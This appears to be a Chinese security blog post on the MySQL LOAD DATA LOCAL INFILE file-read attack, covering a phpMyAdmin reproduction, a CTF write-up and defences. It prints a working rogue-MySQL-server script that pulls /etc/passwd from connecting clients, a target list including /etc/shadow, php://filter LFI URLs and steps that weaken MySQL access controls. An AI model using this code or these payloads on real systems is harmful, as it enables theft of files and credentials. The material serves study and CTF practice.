why811
why811

mysql读取文件

环境地址:phpMyAdmin LOAD DATA INFILE 任意文件读取漏洞 | VULNSPY

参考文章:

mysql任意文件读取漏洞学习_BerL1n的博客-CSDN博客

从一道ctf题学习mysql任意文件读取漏洞 - 安全客,安全资讯平台

MYSQL 任意文件读取

小组CTF出题感想 - x1a0t's Blog

一句话总结:伪造恶意的mysql客户端去请求服务器的资源

下列情况都存在mysql文件读取问题:

  • MySQL Client
  • PHP + mysql/mysqli
  • PHP + PDO (MYSQL_ATTR_LOCAL_INFILE)
  • Python + MySQLdb
  • Python3 + mysqlclient
  • Java + JDBC Driver

于是出现的常见payload有如下几种

https://raw.githubusercontent.com/Gifts/Rogue-MySql-Server/
https://github.com/allyshka/Rogue-MySql-Server
https://github.com/jas502n/CVE-2019-12086-jackson-databind-file-read

漏洞原因

利用了Load data infile语法,在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;从而可以导致mysql进行本地或远程读取文件。

漏洞复现(phpmyadmin)

前置条件

phpmyadmin开启了如下选项

$cfg['AllowArbitraryServer'] = true; //false改为true

则登录时就可以访问远程的服务器。当登陆一个恶意构造的Mysql服务器时,即可利用load data infile读取该服务器上的任意文件。当然前提条件是secure_file_priv参数允许的目录下,且phpmyadmin的用户对该文件有读的权限。

过程

登录网页,进去在/root/exp下,把脚本的3306端口,改位3307

mysql读取文件_第1张图片

运行脚本

python rogue_mysql_server.py,

然后访问80端口,使用host:db:3307登录phpmyadmin。

mysql读取文件_第2张图片

我们回到exp目录下面,然后发现了一个文件。mysql.log,我们读取文件,就可以/etc/passwd ,内容已经被读取到了。

mysql读取文件_第3张图片

exp

exp下载链接

https://github.com/Gifts/Rogue-MySql-Server/

首先,需要配置恶意服务器,然后再file_list选取要读取的文件

PORT = 3306

log = logging.getLogger(__name__)

log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
    tmp_format
)

filelist = (
#    r'c:\boot.ini',
    r'c:\windows\win.ini',
#    r'c:\windows\system32\drivers\etc\hosts',
#    '/etc/passwd',
#    '/etc/shadow',
)

简化的exp分三步走战略

1.回复mysql client一个greeting包
2.等待client端发送一个查询包
3.回复一个file transfer包 
# -*- coding:utf-8 -*-
__author__ = 'leezp'
import socket
import logging

# 读取mysql客户端本地文件,目前的脚本有读取长度限制,特别大的文件读取不完整

logging.basicConfig(level=logging.DEBUG)

filename = "/etc/passwd"
# filename="/root/Desktop/pass.txt"
sv = socket.socket()
sv.bind(("", 9999))
sv.listen(5)
conn, address = sv.accept()
logging.info('Conn from: %r', address)
# 1 Greeting
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x37\x2e\x33\x30\x00\x19\x00\x00\x00\x18\x5b\x10\x16\x2d\x4e\x3b\x7b\x00\xff\xff\x08\x02\x00\xff\xc1\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x42\x40\x67\x53\x2d\x55\x52\x0e\x01\x29\x26\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
# 2 Accept all authentications
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
logging.info("auth okay")
conn.recv(9999)
# 3 read file
# wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
# print(wantfile)
aaa = "\x01\x00\x00\x01\x14\x2e\x00\x00\x02\x03\x64\x65\x66\x00\x00\x00\x18\x61\x75\x74\x6f\x5f\x69\x6e\x63\x72\x65\x6d\x65\x6e\x74\x5f\x69\x6e\x63\x72\x65\x6d\x65\x6e\x74\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x2a\x00\x00\x03\x03\x64\x65\x66\x00\x00\x00\x14\x63\x68\x61\x72\x61\x63\x74\x65\x72\x5f\x73\x65\x74\x5f\x63\x6c\x69\x65\x6e\x74\x00\x0c\x21\x00\x0c\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x2e\x00\x00\x04\x03\x64\x65\x66\x00\x00\x00\x18\x63\x68\x61\x72\x61\x63\x74\x65\x72\x5f\x73\x65\x74\x5f\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x00\x0c\x21\x00\x0c\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x2b\x00\x00\x05\x03\x64\x65\x66\x00\x00\x00\x15\x63\x68\x61\x72\x61\x63\x74\x65\x72\x5f\x73\x65\x74\x5f\x72\x65\x73\x75\x6c\x74\x73\x00\x0c\x21\x00\x0c\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x2a\x00\x00\x06\x03\x64\x65\x66\x00\x00\x00\x14\x63\x68\x61\x72\x61\x63\x74\x65\x72\x5f\x73\x65\x74\x5f\x73\x65\x72\x76\x65\x72\x00\x0c\x21\x00\x12\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x26\x00\x00\x07\x03\x64\x65\x66\x00\x00\x00\x10\x63\x6f\x6c\x6c\x61\x74\x69\x6f\x6e\x5f\x73\x65\x72\x76\x65\x72\x00\x0c\x21\x00\x33\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x22\x00\x00\x08\x03\x64\x65\x66\x00\x00\x00\x0c\x69\x6e\x69\x74\x5f\x63\x6f\x6e\x6e\x65\x63\x74\x00\x0c\x21\x00\x00\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x29\x00\x00\x09\x03\x64\x65\x66\x00\x00\x00\x13\x69\x6e\x74\x65\x72\x61\x63\x74\x69\x76\x65\x5f\x74\x69\x6d\x65\x6f\x75\x74\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x1d\x00\x00\x0a\x03\x64\x65\x66\x00\x00\x00\x07\x6c\x69\x63\x65\x6e\x73\x65\x00\x0c\x21\x00\x09\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x2c\x00\x00\x0b\x03\x64\x65\x66\x00\x00\x00\x16\x6c\x6f\x77\x65\x72\x5f\x63\x61\x73\x65\x5f\x74\x61\x62\x6c\x65\x5f\x6e\x61\x6d\x65\x73\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x28\x00\x00\x0c\x03\x64\x65\x66\x00\x00\x00\x12\x6d\x61\x78\x5f\x61\x6c\x6c\x6f\x77\x65\x64\x5f\x70\x61\x63\x6b\x65\x74\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x27\x00\x00\x0d\x03\x64\x65\x66\x00\x00\x00\x11\x6e\x65\x74\x5f\x62\x75\x66\x66\x65\x72\x5f\x6c\x65\x6e\x67\x74\x68\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x27\x00\x00\x0e\x03\x64\x65\x66\x00\x00\x00\x11\x6e\x65\x74\x5f\x77\x72\x69\x74\x65\x5f\x74\x69\x6d\x65\x6f\x75\x74\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x26\x00\x00\x0f\x03\x64\x65\x66\x00\x00\x00\x10\x71\x75\x65\x72\x79\x5f\x63\x61\x63\x68\x65\x5f\x73\x69\x7a\x65\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x26\x00\x00\x10\x03\x64\x65\x66\x00\x00\x00\x10\x71\x75\x65\x72\x79\x5f\x63\x61\x63\x68\x65\x5f\x74\x79\x70\x65\x00\x0c\x21\x00\x09\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x1e\x00\x00\x11\x03\x64\x65\x66\x00\x00\x00\x08\x73\x71\x6c\x5f\x6d\x6f\x64\x65\x00\x0c\x21\x00\x9b\x01\x00\x00\xfd\x00\x00\x1f\x00\x00\x26\x00\x00\x12\x03\x64\x65\x66\x00\x00\x00\x10\x73\x79\x73\x74\x65\x6d\x5f\x74\x69\x6d\x65\x5f\x7a\x6f\x6e\x65\x00\x0c\x21\x00\x09\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x1f\x00\x00\x13\x03\x64\x65\x66\x00\x00\x00\x09\x74\x69\x6d\x65\x5f\x7a\x6f\x6e\x65\x00\x0c\x21\x00\x12\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x2b\x00\x00\x14\x03\x64\x65\x66\x00\x00\x00\x15\x74\x72\x61\x6e\x73\x61\x63\x74\x69\x6f\x6e\x5f\x69\x73\x6f\x6c\x61\x74\x69\x6f\x6e\x00\x0c\x21\x00\x2d\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x22\x00\x00\x15\x03\x64\x65\x66\x00\x00\x00\x0c\x77\x61\x69\x74\x5f\x74\x69\x6d\x65\x6f\x75\x74\x00\x0c\x3f\x00\x15\x00\x00\x00\x08\xa0\x00\x00\x00\x00\xff\x00\x00\x16\x01\x31\x04\x75\x74\x66\x38\x04\x75\x74\x66\x38\x04\x75\x74\x66\x38\x06\x6c\x61\x74\x69\x6e\x31\x11\x6c\x61\x74\x69\x6e\x31\x5f\x73\x77\x65\x64\x69\x73\x68\x5f\x63\x69\x00\x05\x32\x38\x38\x30\x30\x03\x47\x50\x4c\x01\x30\x07\x34\x31\x39\x34\x33\x30\x34\x05\x31\x36\x33\x38\x34\x02\x36\x30\x07\x31\x30\x34\x38\x35\x37\x36\x03\x4f\x46\x46\x89\x4f\x4e\x4c\x59\x5f\x46\x55\x4c\x4c\x5f\x47\x52\x4f\x55\x50\x5f\x42\x59\x2c\x53\x54\x52\x49\x43\x54\x5f\x54\x52\x41\x4e\x53\x5f\x54\x41\x42\x4c\x45\x53\x2c\x4e\x4f\x5f\x5a\x45\x52\x4f\x5f\x49\x4e\x5f\x44\x41\x54\x45\x2c\x4e\x4f\x5f\x5a\x45\x52\x4f\x5f\x44\x41\x54\x45\x2c\x45\x52\x52\x4f\x52\x5f\x46\x4f\x52\x5f\x44\x49\x56\x49\x53\x49\x4f\x4e\x5f\x42\x59\x5f\x5a\x45\x52\x4f\x2c\x4e\x4f\x5f\x41\x55\x54\x4f\x5f\x43\x52\x45\x41\x54\x45\x5f\x55\x53\x45\x52\x2c\x4e\x4f\x5f\x45\x4e\x47\x49\x4e\x45\x5f\x53\x55\x42\x53\x54\x49\x54\x55\x54\x49\x4f\x4e\x03\x55\x54\x43\x06\x53\x59\x53\x54\x45\x4d\x0f\x52\x45\x50\x45\x41\x54\x41\x42\x4c\x45\x2d\x52\x45\x41\x44\x05\x32\x38\x38\x30\x30\x07\x00\x00\x17\xfe\x00\x00\x02\x00\x02\x00"
conn.sendall(aaa)
print('------------')
content = conn.recv(9999)
print('++++++++++++')
wantfile = "\x0c\x00\x00\x01\xfb\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
logging.info("read file...")
conn.sendall(wantfile)
content = conn.recv(9999)  
#print content
logging.info(content)
conn.close()

漏洞防御

  • 关闭local_infile参数,禁止导入本地文件
  • 开启–ssl-mode=VERIFY_IDENTITY参数,防止连接不安全的mysql服务器

kali复现

mysql读取文件_第4张图片

kali开启local-infile设置

mysql读取文件_第5张图片

可以看到,已经将/etc/passwd下的文件读取进去了。

load data infile 'xxx' into table test; 将服务端文件存入test表中// 受害者服务器
load data local infile into table test; //自己的mysql所在的位置。

当我们开启mysql远程的服务,使用windows去连接kali的mysql

  1. 允许root用户远程连接
GRANT ALL PRIVILEGES ON . TO 'username'@'%' IDENTIFIED BY 'password' WITH GRANT OPTION;
  1. 修改 127.0.0.1 为 0.0.0.0
vim /etc/mysql/mariadb.conf.d/50-server.cnf
  1. 重启服务

Service mysql restart

这时候执行load data local infile '/etc/passwd' into table test; ,会有--secure-file-priv提示。

mysql读取文件_第6张图片

secure_file_priv 值为null ,表示限制mysqld 不允许导入|导出
secure_file_priv 值为 /var/lib/mysql-files/,表示限制mysqld 的导入|导出只能在该目录下
secure_file_priv 无值,表示不对mysqld 的导入|导出做限制

我们需要先置为空,就能得到想要的效果。

CTF实战

有文件包含,在define里提示了 robots.txt。访问后得到了

User-agent:*

Disallow:/install

Disallow:/admin
http://ctf.chaffee.cc:23333/?action=php://filter/convert.base64-encode/resource=admin/index
http://ctf.chaffee.cc:23333/?action=php://filter/convert.base64-encode/resource=install/index

用base64伪协议去读取。

然后的到了flag的地址

之后得到了这里

connect_error) {      
    die($conn->connect_error);} 
else
 {
        $conn->query(
    "DROP DATABASE ".$database);
        $conn->query("CREATE DATABASE ".$database);
//To be continued
        mysqli_close($conn);
        $config = "$host, "user"=>$user, "passwd"=>$passwd), TRUE).";";
       file_put_contents(md5($_SERVER["REMOTE_ADDR"])."/config.php", $config);
    }
}

该文件首先判断当前目录有无install.lock,我们通过上一级目录的文件包含漏洞可以绕过这个判断。下面是接受用户输入登陆mysql数据库,登陆成功的话会执行两个没有任何过滤的SQL语句,然后执行一个文件写入的操作。

按照正常步骤来的话,最后会报一个,No such file or directory的错误。

在执行file_put_contents()函数时,插入了一个文件夹md5($_SERVER["REMOTE_ADDR"])

,而这个函数在文件夹不存在的情况下是不能新建文件夹的,因此这个file_put_contents()

函数并不能利用。

这时,就需要使用mysql来读取这个文件。

第二道题目

https://blog.csdn.net/qq_41107295/article/details/100743094

你可能感兴趣的:(1024程序员节)

  • 「 2023-年度总结 」2023关于三掌柜的每个值得记录的时刻
    目录前言顺利转正被任命为项目经理印象深刻的实战经历:项目重大版本上线系统学习新技术的心得体会获得腾讯云开发者社区优秀作者奖想要安利给所有人的开发工具技术大会招募线下沙龙圆桌主持新书发布上市受邀直播探会接受采访组织1024程序员节活动获得1024超级个体受邀参加特训营分享NPCon大会主持人成为开源讲师参加鸿蒙生态学堂·创新实训营北京站的培训番外篇番外的番外篇我的最大收获与成长2024新年Flag彩
  • 小学生python游戏开发pygame--初始及基础知识 信息化未来 助孩成长pythonpygame开发语言
    #1024程序员节|用代码,改变世界#小学生python游戏开发pygame1--基础知识前言知识点1、python知识点1.1RGB颜色表示1.2类2.3pygame.display.update()2.4加载图片2.5鼠标键盘2.6颜色2.7中文字体2.8音效总结源码获取前言Pygame是被设计用来写游戏的python模块集合,Pygame是在优秀的SDL库之上开发的功能性包。使用python
  • 上海海事大学自动化专业C语言课程代码参考(第七周) xiao咲 学习作业1024程序员节自动化c语言
    想不到这么快就到了新的一周,写上周的作业仿佛就在两天前正好今天是1024程序员节,写C语言作业非常应景这周的作业主要是循环,话不多说,直接开始吧!目录上机实验4-1求1到100的和输入格式:输出格式:4-2求100以内偶数和输入格式:输出格式:4-3N分之一序列前N项和输入格式:输出格式:输入样例:输出样例:4-4求奇数分之一序列前N项和输入格式:输出格式:输入样例:输出样例:4-5求简单交错序列
  • 提升自己才是王道 TigerChain
    投资自己程序员节今天是1024程序员节日,在今天这个特殊的日子却蹦出一条,"缩招"新闻,也是继BATJ之后又一个事件,且不说这些事件的真伪「最后官方都出来辟谣」,通过这些事情我们能干什么,我们应该干什么才是值得我们去思考的企业难不得不承认,企业现在不好做,特别是今年,大的环境不怎么太好,小企业更是难上加难,更别提什么创业公司「成功的难可想而知,在夹缝中都不一定能生存」,现在刚刚过了招聘黄金阶段「俗
  • 代码随想录-栈与队列|ACM模式(1024程序员节) 希希雾里 代码随想录感想leetcodec++数据结构算法1024程序员节
    目录20.有效的括号题目描述:输入输出描述:思路和想法:1047.删除字符串中的所有相邻重复项题目描述:输入输出描述:思路和想法:150.逆波兰表达式求值题目描述:输入输出描述:思路和想法:239.滑动窗口最大值题目描述:输入输出描述:思路和想法:347.前K个高频元素题目描述:输入输出描述:思路和想法:20.有效的括号题目描述:给定一个只包括'(',')','{','}','[',']'的字符串
  • 我的工作观 Bonnie714
    看到鱼哥说今天的这篇文章,直接输入中秋节三个字就能跳过,我真的有些心动。好想就这样跳过休息一下,但是回过头一想,不可以,坚持任何一个好习惯都不是为了别人,而是自己。今天的话题是工作。提到工作,有时候我非常好奇。身边的许多人,包括我自己在内,我们总是会觉得别人的工作特别好,而是自己的工作哪都不行。刚好今天是1024程序员节日,在互联网公司上班,自然有很多程序员小哥哥,从一大早开始,总部HR就在带头给
  • 1024程序员节|FFmpeg 调整声道数、采样率、码率 小曾同学.com 音视频1024程序员节FFmpeg调整采样率FFmpeg更改声道数FFmpeg命令大全
    前言:作者简介:小曾同学.com,小伙伴们也可以叫我小曾,一个致力于测试开发的博主⛽️如果文章知识点有错误的地方,还请大家指正,让我们一起学习,一起进步。座右铭:不想当开发的测试,不是一个好测试✌️。如果感觉博主的文章还不错的话,还请点赞、收藏哦!之前给大家分享过流媒体资源归档,但是这些流媒体小编并没有对其进行再次划分,比如采样率或者声道数。因为最近有产品出现使用hev2编码方式的音视频,存在异常
  • 大模型上下文扩展之YaRN解析:从直接外推ALiBi、位置插值、NTK-aware插值、YaRN v_JULY_v 论文代码应用大模型上下文扩展RoPEALiBi位置插值YaRN
    前言下半年以来,我全力推动我司大模型项目团队的组建,我虽兼管整个项目团队,但为了并行多个项目,最终分成了三个项目组,每个项目都有一个项目负责人,分别为霍哥、阿荀、朝阳在今年Q4,我司第一项目组的第一个项目「AIGC模特生成平台」得到CSDN蒋总的大力支持,并亮相于CSDN举办的1024程序员节,一上来就吸引了很多市里领导、媒体、观众的关注,如今该平台的入口链接已在七月官网右上角而第二项目组的论文审
  • 1024程序员节 | 美团技术团队做了这样一件小事 美团技术团队
    “老师,你看我跳的高不高!”“老师,我想和你玩老鹰抓小鸡”“老师,我知道,这是能送东西的无人机”……七嘴八舌的声音围绕着韩洋和仕禄两位程序员,这是他们当“幼儿园老师”的初体验。也是美团技术团队和孩子们的一个美好约定。打开方式一延续1024程序员节的专属爱心一年前的今天,美团技术团队通过捐赠技术博客稿费和讲师课酬,为美团乡村儿童操场公益计划捐赠了1,024个拼接地板,跟美团1409位爱心网友一起,帮
  • 邮件归档与数据匹配:筛选出未按时提交邮件的员工名单 邓大帅 工程实战vlookupVLOOKUP函数邮件数据匹配Excel
    又是一年1024,近期由于诸多事务需要同步处理,博客更新不积极,感谢粉丝们的支持与守候,之后我将尽可能地将更多干货与心得呈现于大家,敬请期待。值此1024程序员节,想和大家探讨下日常工作中大批量数据匹配的问题。在日常工作中,对于收集邮件的任务,较为繁琐的一环就是邮件的归档和数据匹配,能否在短时间内快速筛选出未按时提交邮件的员工名单,直接影响着后续工作能否顺利开展。近期发现许多人并不知如何进行数据筛
  • 1024程序员节,节日快乐 朱光亮_19强化班
    1024程序员节是广大程序员的共同节日。1024是2的十次方,二进制计数的基本计量单位之一。针对程序员经常周末加班与工作日熬夜的情况,部分互联网机构倡议每年的10月24日为1024程序员节,在这一天建议程序员拒绝加班。程序员就像是一个个1024,以最低调、踏实、核心的功能模块搭建起这个科技世界。1G=1024M,而1G与1级谐音,也有一级棒的意思。节日背景:程序员(英文Programmer)是从事
  • 祝各位程序员节日快乐 数据分析不是个事儿 社畜生活生活
    今天是1024程序员节,小编祝各位Windows开机蓝屏,Linux开机KernelPanic,macos开机五国,服务器iDRAC/iLO/IPMI/KVM全部失联,路由器全爆炸,路由表内存全溢出,交换机全环路,防火墙全阻断,无线信道全冲突,压接网线全短路,bgp全漏表,机柜全断电,raid全爆炸,nas数据全丢,光模块全炸,光纤全不通,光猫全烫手,电表全倒转,空开全烧穿。PHP全FatalEr
  • 1024 Z_sam
    1024纪念一下1024程序员节是中国程序员的共同节日。1024是2的十次方,二进制计数的基本计量单位之一。程序员(英文Programmer)是从事程序开发、维护的专业人员。程序员就像是一个个1024,以最低调、踏实、核心的功能模块搭建起这个科技世界。1G=1024M,而1G与1级谐音,也有一级棒的意思。
  • 1024程序员节竟然和他有关? 我只会写Bug啊 杂谈1024程序员节
    目录介绍节日背景节日由来介绍1024程序员节(1024Programmer’sDay)是广大程序员的共同节日。1024是2的十次方,二进制计数的基本计量单位之一。针对程序员经常周末加班与工作日熬夜的情况,部分互联网机构倡议每年的10月24日为1024程序员节,在这一天建议程序员拒绝加班。程序员就像是一个个1024,以最低调、踏实、核心的功能模块搭建起这个科技世界。1G=1024M,而1G与1级谐音
  • 【趣味Javascript】前端开发中不为人知的LHS和RHS查询,你真的弄明白了吗? 《1024程序员节特别篇》 极客小俊 【趣味Javascript】1024程序员节前端开发LHS和RHS查询javascript编程知识分享作用域链函数
    个人主页极客小俊✍作者简介:web开发者、设计师、技术分享博主希望大家多多支持一下,我们一起进步!如果文章对你有帮助的话,欢迎评论点赞收藏加关注前言今天是1024先祝大家节日快乐,那么今天我就给大家讲一个js小知识,也就是LHS和RHS可能还有很多朋友不知道LHS和RHS是个啥玩意!那么在我们讲解LHS和RHS之前我们先来回忆一下最简单的赋值操作!vartest=100;console.log(t
  • 1024程序员节日:庆祝创新与编码的盛宴 爱笑的男孩。 活动1024程序员节
    作者主页:爱笑的男孩。的博客_CSDN博客-深度学习,活动,python领域博主爱笑的男孩。擅长深度学习,活动,python,等方面的知识,爱笑的男孩。关注算法,python,计算机视觉,图像处理,深度学习,pytorch,神经网络,opencv领域.https://blog.csdn.net/Code_and516?type=blog个人简介:打工人。持续分享:机器学习、深度学习、python相
  • 1024程序员节快乐 李格式
    今天是1024程序员节,致敬互联网时代最可爱的人。他们改变了我们出行、购物、支付等方式,他们改变了这个世界。对于一个屌丝来讲,什么职业能令人获得崇高的敬意?只有程序员吧。程序员是一群单纯的人,他们只管将精力用到技术上,精益求精就好。见过很多程序员,问他们为什么选择这个职业。他们说:“自己没什么背景,也不会搞什么关系,又不会销售,在家乡可能就是最底层的人,能吃饱饭就不错了。但做程序员就不一样了,只要
  • 我的编程之旅:热爱代码,燃烧激情 琴剑飘零西复东 程序人生业界资讯学习方法创业创新改行学it
    正好适逢1024程序员节,我想通过这篇博客文章,表达对编程的热爱,同时也鼓励更多的人踏上这条充满无限可能的道路。我还记得第一次接触编程的时刻,那是在大学的一堂计算机科学课上。当我第一次看到一个简单的“Hello,World!”程序在屏幕上显示出来时,我被深深吸引住了。那时的我对编程一无所知,但我立刻明白,这就是我要追求的事业。我的编程之旅并不是一帆风顺的。起初,我常常遇到困难,感觉陷入了无尽的Bu
  • 基于敏捷开发的低代码平台建设 万应低代码 低代码万应低代码云畅科技低代码敏捷开发软件构建
    10月24日,由湖南省工业和信息化厅、湖南湘江新区管委会指导,长沙市工业和信息化局、长沙信息产业园管委会、CSDN主办,湖南省软件行业协会、国家超级计算长沙中心承办的2023长沙·中国1024程序员节——湖南“智赋万企”软件产业高质量发展论坛在长沙举办。云畅科技CTO胡艳平受邀出席并发表以《基于敏捷开发的低代码平台建设》为主题的演讲,深入浅出地分享了如何通过敏捷开发和低代码平台的建设,实现软件产业
  • Vue3 开发实战分享——打印插件 Print.js 的使用(Vue3 + Nodejs + Print.js 实战)以及 el-table 与 el-pagination 的深入使用(下) 黛琳ghz 前端#Vue#Elementjavascriptvue.js前端1024程序员节
    文章目录关于CSDN1024前情回顾&前言关于el-table项目中延申使用1️⃣获取每行对应的内容数据2️⃣行内数据判断处理(过滤)3️⃣对表格内容的索引关于el-pagination项目中延申使用1️⃣显示总条数与分页展示2️⃣跳转页和页码样式3️⃣设置为中文最后关于CSDN1024在进入文章的正文之前,我们先一起了解一下关于CSDN今年的1024程序员节。与此同时这也是我在CSDN参与的第二
  • 为什么说10.24是程序员的节日 词不达意难知 1024程序员节
    “10.24”被称为程序员的节日,是因为在中国的程序员社区中,这个日期被视为一个特殊的日子,用来庆祝和纪念程序员的工作和贡献。这个日期的由来可以追溯到中国的IT技术社区“1024程序员节”,该社区于2010年创立,旨在为程序员们提供一个交流和学习的平台。每年的10月24日,这个社区会组织一系列的线上和线下活动,包括技术分享、讲座、比赛等,以庆祝程序员的职业和技术成就。“10.24程序员节”的设立是
  • 极狐GitLab 致敬中国 1000万程序员 极小狐 1024程序员节
    又到了一年的10月24日,这个只有特定人群才能懂的节日——1024程序员节。截止到目前,中国已经有1000万程序员,这个庞大的群体改变了中国数字化的进程。在这个特殊的节日里,极狐GitLab特地制作了一个视频,向中国1000万程序员致敬。极狐GitLab致敬中国1000万程序员关于极狐(GitLab)极狐(GitLab)以“核心开放”为原则,面向中国市场,提供开箱即用的开放式一体化安全DevOps
  • 【OpenGL学习笔记⑦】——键盘控制镜头的平移【3D正方体 透视投影 观察矩阵 对LookAt的理解】 一支王同学 OpenGL学习笔记opengl3d渲染1024程序员节
    1024程序员节文章目录零、成果预览图一、透视矩阵(透视投影)二、观察矩阵(摄像机)1.1摄影机的位置1.2摄影机的朝向向量1.3摄影机的正视向量1.4摄影机世界的Z、X、Y轴向量1.5LookAt矩阵三、键盘互动(让摄影机随键盘移动)3.1前后左右上下移动的实现3.2在顶点着色器里的处理四、Camera类五、完整代码六、参考附录:移动的镜头上一篇文章链接:【OpenGL学习笔记⑥】——3D变换【
  • 【人物志】美团首席科学家夏华夏:不断突破边界的程序人生 美团技术团队 人物夏华夏无人配送美团
    “成长没有什么秘笈,就是坚持不断地一点点突破自己的边界就好。”这是美团首席科学家、无人配送部总经理夏华夏在刚刚过去的“1024程序员节”时送给技术同行的一句话。这也是夏华夏自己的人生写照:从没摸过计算机的山东高考状元到清华计算机系的学霸,从美国名校深造、Google修炼6年到选择回国,从加入当时还很小的美团到负责公司最大业务的总体架构,从架构师转为无人配送这个前沿业务部门的管理者,夏华夏就是在不断
  • 亚马逊云科技发布完整端到端 AI 技术堆栈,力促生成式 AI 更加普惠 CSDN云计算 AI云计算AIGC生成式AIAI亚马逊云科技CodeWhisperer
    AI大模型已经深入各行业的场景应用,作为云技术巨头的亚马逊云科技在今年也发布了多个生成式AI相关的技术与服务。在今年7月亚马逊云科技中国峰会上,亚马逊云科技也表示正在与全球超过12万的合作伙伴一同转型、构建AIGC生态。2023年的10月24日,也是CSDN1024程序员节的当天,亚马逊云科技举办了生成式AI构建者大会,这次的技术大会聚焦于生成式AI领域,分享了其完整的端到端生成式AI技术堆栈,可
  • 1024程序员节怎么来的? 知识汲取者 #杂记_计算机杂记1024程序员节
    1024程序员节怎么来的?转载:这日子网络疯传,1024究竟是什么节日?PS:觉得这篇文章写得很好,并且迎合当下场景,所以就转载了,如有侵权,还请及时告知,博主将立即删除本文  知道今天是什么特殊日子吗?身边的人包括网友都在互道节日快乐,他们说今天是『1024节』,是不是一头雾水?“1024”不就一个普通数字,怎么就成了节日?实际上,每年10月24日是程序员节,是有来历的!  今天是10月24日农
  • 1024程序员节特辑 | C++入门指南:内存管理(建议收藏!!) 小宇成长录 C++经典收录c语言c++java笔记
    1024程序员节特辑|C++入门指南:内存管理(建议收藏!!)一、C/C++内存分布1.1相关例题二、C语言中动态内存管理方式:malloc/calloc/realloc/free2.1相关面试题三、C++内存管理方式3.1new/delete操作内置类型3.2new和delete操作自定义类型四、operatornew与operatordelete函数4.1operatornew抛异常演示五、n
  • P4774 [NOI2018] 屠龙勇士 Tonvia 学习题解算法&数论1024程序员节
    #1024程序员节征文活动[NOI2018]屠龙勇士搬题面:[NOI2018]屠龙勇士题目描述小D最近在网上发现了一款小游戏。游戏的规则如下:游戏的目标是按照编号1→n1\rightarrown1→n顺序杀掉nnn条巨龙,每条巨龙拥有一个初始的生命值aia_iai。同时每条巨龙拥有恢复能力,当其使用恢复能力时,它的生命值就会每次增加pip_ipi,直至生命值非负。只有在攻击结束后且当生命值恰好为0
  • 什么是1024程序员节 面相进程,面相对象 1024程序员节
    一年一度专属于程序员的节日“1024程序员节”要到来了,相信有很多的小伙伴跟我一样,对这个节日非常的熟悉,但也有一下小伙伴对这个节日非常陌生,没事,下面由我来讲解一下1024程序员节。目录节日背景节日由来社会影响节日背景在1834年,人称“数字女王”的阿达·洛芙莱斯(AdaLovelace)的朋友英国数学家、发明家兼机械工程师查尔斯·巴贝其(CharlesBabbage)发明了一台分析机;阿达则致
  • 【1024程序员节特刊】算法题目易错之处干货总结 亿维数组 超强总结性干货文章Algorithm1024程序员节干货c++算法
    前言本文收藏了博主在做编程题目debug过程当中最常遇到的问题,本文随时更新,同时,如果文章有什么错误,或者其它的经验,希望各位大佬在评论区中分享正文1.sort排序的时候,如果数组下标从1开始,一定要变一下形式比如://下标从1开始inta[100];for(inti=1;i>a[i];sort(a+1,a+10+1)//而不是sort(a,a+10)2.实在想不出来哪里错了的时候,检查数据类型
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
